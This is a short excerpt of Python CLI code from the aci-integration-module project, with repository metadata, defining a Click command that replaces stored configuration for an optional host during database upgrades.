@click.argument('host', required=False)
@click.pass_context
def replace(ctx, host):
"""Used for upgrading database."""
host = host or ''
ctx.obj['manager'].replace_all(ctx.obj['conf'], host=host)
|
noironetworks/aci-integration-module
|
aim/tools/cli/commands/config.py
|
Python
|
apache-2.0
| 1,450 | 0 |